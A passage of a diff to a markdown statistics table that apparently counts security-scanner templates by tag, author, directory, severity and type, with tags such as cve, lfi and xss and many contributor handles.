-| git | 3 | @dwisiswant0 | 1 | | | | | | | -| amazon | 3 | ohlinge | 1 | | | | | | | -| oa | 3 | regala_ | 1 | | | | | | | -| terramaster | 3 | mass0ma | 1 | | | | | | | -| nacos | 3 | evolutionsec | 1 | | | | | | | -| nosqli | 3 | johnk3r | 1 | | | | | | | -| targa | 3 | co0nan | 1 | | | | | | | -| vbulletin | 3 | daviey | 1 | | | | | | | -| intrusive | 3 | berkdusunur | 1 | | | | | | | -| zabbix | 3 | 0xtavian | 1 | | | | | | | -| slack | 3 | th3.d1p4k | 1 | | | | | | | -| r-seenet | 3 | shifacyclewla | 1 | | | | | | | -| microstrategy | 3 | bjhulst | 1 | | | | | | | -| ssh | 3 | omarkurt | 1 | | | | | | | -| httpd | 3 | fmunozs | 1 | | | | | | | -| itop | 3 | mesaglio | 1 | | | | | | | -| log | 3 | sicksec | 1 | | | | | | | -| kevinlab | 3 | kabirsuda | 1 | | | | | | | -| kafka | 3 | iampritam | 1 | | | | | | | -| bitrix | 3 | _harleo | 1 | | | | | | | -| backups | 3 | ipanda | 1 | | | | | | | -| springcloud | 3 | sy3omda | 1 | | | | | | | -| nexus | 3 | aceseven (digisec360) | 1 | | | | | | | -| tikiwiki | 3 | bernardofsr | 1 | | | | | | | -| bypass | 3 | toufik airane | 1 | | | | | | | -| couchdb | 2 | yashanand155 | 1 | | | | | | | -| cve2005 | 2 | mubassirpatel | 1 | | | | | | | -| flir | 2 | streetofhackerr007 | 1 | | | | | | | -| natshell | 2 | ilovebinbash | 1 | | | | | | | -| mida | 2 | skeltavik | 1 | | | | | | | -| nagios | 2 | un-fmunozs | 1 | | | | | | | -| npm | 2 | 0ut0fb4nd | 1 | | | | | | | -| splunk | 2 | its0x08 | 1 | | | | | | | -| guacamole | 2 | zhenwarx | 1 | | | | | | | -| yapi | 2 | exploitation | 1 | | | | | | | -| maian | 2 | rtcms | 1 | | | | | | | -| waf | 2 | smaranchand | 1 | | | | | | | -| sonicwall | 2 | alperenkesk | 1 | | | | | | | -| cve2007 | 2 | thevillagehacker | 1 | | | | | | | -| jeedom | 2 | aresx | 1 | | | | | | | -| geowebserver | 2 | luci | 1 | | | | | | | -| status | 2 | adrianmf | 1 | | | | | | | -| plesk | 2 | knassar702 | 1 | | | | | | | -| prometheus | 2 | kre80r | 1 | | | | | | | -| globalprotect | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| seeyon | 2 | andysvints | 1 | | | | | | | -| keycloak | 2 | d0rkerdevil | 1 | | | | | | | -| frp | 2 | noamrathaus | 1 | | | | | | | -| telerik | 2 | pudsec | 1 | | | | | | | -| github | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| akkadian | 2 | 52971 | 1 | | | | | | | -| smb | 2 | yashgoti | 1 | | | | | | | -| prestashop | 2 | blckraven | 1 | | | | | | | -| chiyu | 2 | jteles | 1 | | | | | | | -| leak | 2 | nytr0gen | 1 | | | | | | | -| avantfax | 2 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| dolibarr | 2 | alph4byt3 | 1 | | | | | | | -| openfire | 2 | undefl0w | 1 | | | | | | | -| spark | 2 | vzamanillo | 1 | | | | | | | -| oauth | 2 | idealphase | 1 | | | | | | | -| ec2 | 2 | shelld3v | 1 | | | | | | | -| jboss | 2 | pratik khalane | 1 | | | | | | | -| rockethchat | 2 | sshell | 1 | | | | | | | -| node | 2 | cookiehanhoan | 1 | | | | | | | -| wordfence | 2 | kba@sogeti_esec | 1 | | | | | | | -| openam | 2 | retr0 | 1 | | | | | | | -| icewarp | 2 | _darrenmartyn | 1 | | | | | | | -| sharepoint | 2 | apt-mirror | 1 | | | | | | | -| mail | 2 | abison_binoy | 1 | | | | | | | -| axis2 | 2 | remonsec | 1 | | | | | | | -| proxy | 2 | 0xteles | 1 | | | | | | | -| grav | 2 | hakluke | 1 | | | | | | | -| rockmongo | 2 | alex | 1 | | | | | | | -| firebase | 2 | affix | 1 | | | | | | | -| saltstack | 2 | infosecsanyam | 1 | | | | | | | -| service | 2 | juicypotato1 | 1 | | | | | | | -| jellyfin | 2 | dawid-czarnecki | 1 | | | | | | | -| trixbox | 2 | @github.com/defr0ggy | 1 | | | | | | | -| odoo | 2 | 0xrod | 1 | | | | | | | -| azure | 2 | willd96 | 1 | | | | | | | -| pega | 2 | bad5ect0r | 1 | | | | | | | -| bigip | 2 | intx0x80 | 1 | | | | | | | -| injection | 2 | ajaysenr | 1 | | | | | | | -| dos | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| jsf | 2 | b0rn2r00t | 1 | | | | | | | -| middleware | 2 | rodnt | 1 | | | | | | | -| mcafee | 2 | sullo | 1 | | | | | | | -| ecology | 2 | naglinagli | 1 | | | | | | | -| glassfish | 2 | manuelbua | 1 | | | | | | | -| hpe | 2 | pdp | 1 | | | | | | | -| netis | 2 | patralos | 1 | | | | | | | -| rstudio | 2 | petruknisme | 1 | | | | | | | -| igs | 2 | chron0x | 1 | | | | | | | -| linkerd | 2 | flag007 | 1 | | | | | | | -| hoteldruid | 2 | mhdsamx | 1 | | | | | | | -| nextjs | 2 | ratnadip gajbhiye | 1 | | | | | | | -| axis | 2 | rojanrijal | 1 | | | | | | | -| voipmonitor | 2 | ahmed sherif | 1 | | | | | | | -| kibana | 2 | philippdelteil | 1 | | | | | | | -| phpcollab | 2 | micha3lb3n | 1 | | | | | | | -| backdoor | 2 | wabafet | 1 | | | | | | | -| paloalto | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| xxljob | 2 | shreyapohekar | 1 | | | | | | | -| vrealize | 2 | bolli95 | 1 | | | | | | | -| webcam | 2 | absshax | 1 | | | | | | | -| emerge | 2 | tirtha_mandal | 1 | | | | | | | -| hasura | 2 | 0h1in9e | 1 | | | | | | | -| shellshock | 2 | gboddin | 1 | | | | | | | -| strapi | 2 | yavolo | 1 | | | | | | | -| idrac | 2 | fopina | 1 | | | | | | | -| showdoc | 2 | makyotox | 1 | | | | | | | -| chamilo | 2 | tim_koopmans | 1 | | | | | | | -| horde | 2 | thezakman | 1 | | | | | | | -| hjtcloud | 2 | ringo | 1 | | | | | | | -| ucmdb | 2 | sec_hawk | 1 | | | | | | | -| akamai | 2 | furkansenan | 1 | | | | | | | -| kentico | 2 | qlkwej | 1 | | | | | | | -| smtp | 2 | whynotke | 1 | | | | | | | -| hashicorp | 2 | geraldino2 | 1 | | | | | | | -| activemq | 2 | taielab | 1 | | | | | | | -| huawei | 2 | jeya seelan | 1 | | | | | | | -| cache | 2 | soyelmago | 1 | | | | | | | -| sonarqube | 2 | elmahdi | 1 | | | | | | | -| fortios | 2 | s1r1u5_ | 1 | | | | | | | -| etouch | 1 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| bash | 1 | becivells | 1 | | | | | | | -| 74cms | 1 | izn0u | 1 | | | | | | | -| smartblog | 1 | j33n1k4 | 1 | | | | | | | -| cloudflare | 1 | b0yd | 1 | | | | | | | -| api-manager | 1 | ooooooo_q | 1 | | | | | | | -| clink-office | 1 | raesene | 1 | | | | | | | -| codeigniter | 1 | kareemse1im | 1 | | | | | | | -| solarlog | 1 | borna nematzadeh | 1 | | | | | | | -| interlib | 1 | andirrahmani1 | 1 | | | | | | | -| primetek | 1 | schniggie | 1 | | | | | | | -| nexusdb | 1 | bernardo rodrigues | 1 | | | | | | | -| | | @bernardofsr | andré monteiro | | | | | | | | -| | | @am0nt31r0 | | | | | | | | -| exponentcms | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| prtg | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| scimono | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| cacti | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| eprints | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| openemr | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| sage | 1 | | | | | | | | | -| achecker | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| zyxel | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| cherokee | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| sophos | 1 | | | | | | | | | -| jquery | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| trane | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| office365 | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| miscrsoft | 1 | | | | | | | | | -| phpfastcache | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| qcubed | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| clickhouse | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| yachtcontrol | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| commscope | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| twitter-server | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| spip | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| rdp | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| linux | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| chevereto | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| expressjs | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| centreon | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| szhe | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| qdpm | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| cerebro | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| robomongo | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| blue-ocean | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| sceditor | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| camera | 1 | | | | | | | | | -| dnssec | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| exposures | 1 | | | | | | | | | -| default | 1 | | | | | | | | | -| hiawatha | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| tjws | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| zzzcms | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| zmanda | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| smi | 1 | | | | | | | | | -| magicflow | 1 | | | | | | | | | -| perl | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| wavlink | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| froxlor | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| sar2html | 1 | | | | | | | | | -| rmi | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| processmaker | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| elascticsearch | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| simplecrm | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| sgp | 1 | | | | | | | | | -| pagespeed | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| argussurveillance | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| cve2006 | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| dbeaver | 1 | | | | | | | | | -| xmlchart | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| owa | 1 | | | | | | | | | -| asus | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| phpfusion | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| eyelock | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| expose | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| oneblog | 1 | | | | | | | | | -| sangfor | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| geutebruck | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| couchbase | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| manageengine | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| commax | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| resourcespace | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| announcekit | 1 | | | | | | | | | -| ruckus | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| viewlinc | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| wondercms | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| getsimple | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| openx | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| bedita | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| cves2016 | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| netmask | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| azkaban | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| apos | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| iptime | 1 | | | | | | | | | -| cofax | 1 | | | | | | | | | -| spring | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| graphite | 1 | | | | | | | | | -| ghost | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| lighttpd | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| aruba | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| tieline | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| pcoip | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| ilo | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| addpac | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| gespage | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| xvr | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| ueditor | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| nps | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| monitorr | 1 | | | | | | | | | -| craftcms | 1 | | | | | | | | | -| bigbluebutton | 1 | | | | | | | | | -| whm | 1 | | | | | | | | | -| meraki | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| logontracer | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| netgenie | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|----------------------|-------|--------------------------------|-------|------------------|-------|----------|-------|---------|-------| +| cve | 690 | dhiyaneshdk | 252 | cves | 696 | info | 625 | http | 1904 | +| lfi | 250 | pikpikcu | 250 | vulnerabilities | 291 | high | 540 | file | 46 | +| panel | 248 | daffainfo | 199 | exposed-panels | 247 | medium | 428 | network | 41 | +| xss | 227 | pdteam | 195 | exposures | 186 | critical | 267 | dns | 11 | +| exposure | 226 | geeknik | 151 | technologies | 178 | low | 147 | | | +| wordpress | 207 | dwisiswant0 | 132 | misconfiguration | 131 | | | | | +| rce | 195 | gy741 | 72 | takeovers | 63 | | | | | +| tech | 169 | madrobot | 62 | default-logins | 56 | | | | | +| cve2020 | 160 | princechaddha | 60 | file | 46 | | | | | +| wp-plugin | 140 | pussycat0x | 58 | workflows | 36 | | | | | +| cve2021 | 115 | gaurang | 42 | network | 32 | | | | | +| cve2019 | 93 | 0x_akoko | 33 | miscellaneous | 24 | | | | | +| config | 93 | ice3man | 26 | iot | 23 | | | | | +| cve2018 | 82 | organiccrap | 24 | dns | 11 | | | | | +| joomla | 74 | philippedelteil | 23 | cnvd | 9 | | | | | +| apache | 68 | sheikhrishad | 15 | fuzzing | 9 | | | | | +| takeover | 66 | milo2012 | 14 | headless | 5 | | | | | +| token | 65 | techbrunchfr | 13 | | | | | | | +| cve2010 | 64 | pr3r00t | 13 | | | | | | | +| default-login | 63 | suman_kar | 12 | | | | | | | +| iot | 62 | cyllective | 11 | | | | | | | +| oob | 51 | r3dg33k | 11 | | | | | | | +| cve2017 | 49 | random_robbie | 10 | | | | | | | +| file | 46 | wdahlenb | 10 | | | | | | | +| unauth | 45 | righettod | 10 | | | | | | | +| network | 41 | nadino | 9 | | | | | | | +| sqli | 38 | hackergautam | 9 | | | | | | | +| | 36 | melbadry9 | 9 | | | | | | | +| oracle | 36 | that_juan_ | 8 | | | | | | | +| ssrf | 35 | aashiq | 8 | | | | | | | +| cve2016 | 32 | iamthefrogy | 8 | | | | | | | +| logs | 30 | techryptic (@tech) | 7 | | | | | | | +| redirect | 30 | oppsec | 7 | | | | | | | +| jira | 28 | randomstr1ng | 7 | | | | | | | +| atlassian | 27 | dogasantos | 7 | | | | | | | +| listing | 25 | emadshanab | 7 | | | | | | | +| misc | 23 | dr_set | 7 | | | | | | | +| disclosure | 21 | 0x240x23elu | 7 | | | | | | | +| cve2015 | 21 | kophjager007 | 7 | | | | | | | +| auth-bypass | 20 | harshbothra_ | 7 | | | | | | | +| generic | 20 | puzzlepeaches | 6 | | | | | | | +| router | 19 | __fazal | 6 | | | | | | | +| aem | 19 | meme-lord | 6 | | | | | | | +| cisco | 19 | caspergn | 6 | | | | | | | +| sap | 18 | logicalhunter | 6 | | | | | | | +| springboot | 17 | yanyun | 5 | | | | | | | +| debug | 16 | elsfa7110 | 5 | | | | | | | +| cve2014 | 15 | iamnoooob | 5 | | | | | | | +| misconfig | 15 | pentest_swissky | 5 | | | | | | | +| cve2011 | 14 | panch0r3d | 5 | | | | | | | +| weblogic | 14 | joanbono | 5 | | | | | | | +| cve2012 | 14 | rootxharsh | 5 | | | | | | | +| login | 14 | ganofins | 5 | | | | | | | +| android | 13 | lu4nx | 4 | | | | | | | +| php | 13 | xelkomy | 4 | | | | | | | +| struts | 13 | github.com/its0x08 | 4 | | | | | | | +| fuzz | 13 | e_schultze_ | 4 | | | | | | | +| adobe | 13 | nodauf | 4 | | | | | | | +| devops | 13 | jarijaas | 3 | | | | | | | +| jenkins | 12 | binaryfigments | 3 | | | | | | | +| dlink | 12 | mavericknerd | 3 | | | | | | | +| dns | 12 | impramodsargar | 3 | | | | | | | +| cve2013 | 11 | vsh00t | 3 | | | | | | | +| zoho | 11 | yash anand @yashanand155 | 3 | | | | | | | +| dell | 10 | johnk3r | 3 | | | | | | | +| aws | 10 | dudez | 3 | | | | | | | +| xxe | 9 | shifacyclewala | 3 | | | | | | | +| magento | 9 | 0w4ys | 3 | | | | | | | +| ftp | 9 | incogbyte | 3 | | | | | | | +| airflow | 8 | z3bd | 3 | | | | | | | +| ruijie | 8 | skeltavik | 3 | | | | | | | +| cnvd | 8 | emenalf | 3 | | | | | | | +| nginx | 8 | idealphase | 3 | | | | | | | +| scada | 8 | tess | 3 | | | | | | | +| rails | 8 | _generic_human_ | 3 | | | | | | | +| intrusive | 8 | shine | 3 | | | | | | | +| gitlab | 8 | f1tz | 3 | | | | | | | +| vmware | 7 | thomas_from_offensity | 3 | | | | | | | +| cve2009 | 7 | fyoorer | 3 | | | | | | | +| kubernetes | 7 | hetroublemakr | 2 | | | | | | | +| confluence | 7 | ree4pwn | 2 | | | | | | | +| backup | 7 | koti2 | 2 | | | | | | | +| coldfusion | 7 | bing0o | 2 | | | | | | | +| ibm | 7 | cocxanh | 2 | | | | | | | +| google | 7 | swissky | 2 | | | | | | | +| cms | 7 | 0xprial | 2 | | | | | | | +| netgear | 7 | dheerajmadhukar | 2 | | | | | | | +| files | 7 | lotusdll | 2 | | | | | | | +| rconfig | 6 | whoever | 2 | | | | | | | +| jetty | 6 | w4cky_ | 2 | | | | | | | +| solr | 6 | arcc | 2 | | | | | | | +| laravel | 6 | amsda | 2 | | | | | | | +| citrix | 6 